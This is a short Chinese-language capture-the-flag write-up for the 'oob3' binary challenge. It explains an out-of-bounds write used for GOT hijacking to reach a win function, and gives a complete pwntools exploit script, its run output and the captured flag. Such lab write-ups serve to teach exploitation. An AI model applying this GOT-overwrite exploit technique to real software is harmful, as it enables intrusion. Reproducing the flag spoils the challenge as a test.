Pwnctf oob3 Writeup

oob3

這題執行起來跟 oob2 一樣（如下所示），但是逆向看會發現用 admin 登入之後他不會幫我們開 shell，但是有 win 可以開 shell，所以這題其實就是 oob write 的 ret2win，這裡選擇的做法是 Got Hijacking，隨便選一個 fgets 之後出現的函式都可以。

執行：

└─$ ./oob3
User ID: -4
Nickname: kazma
PIN: 1234
Logging as [kazma] ... Failed
Incorrect PIN code!

exploit 如下：

from pwn import *
import warnings
warnings.filterwarnings("ignore", category = BytesWarning)

r = process("./oob3")
win = 0x400924

r.sendlineafter(b":", "-17") #0x601038 <strcspn@GLIBC_2.2.5>
r.sendlineafter(b":", p64(win))

r.sendline("cat f*")
r.interactive()

Result:

└─$ python exploit.py
[+] Starting local process './oob3': pid 3521008
[*] Switching to interactive mode
 BreakALLCTF{Dmq1Qe1QYOhxae8KhxVc}

Pwned !!!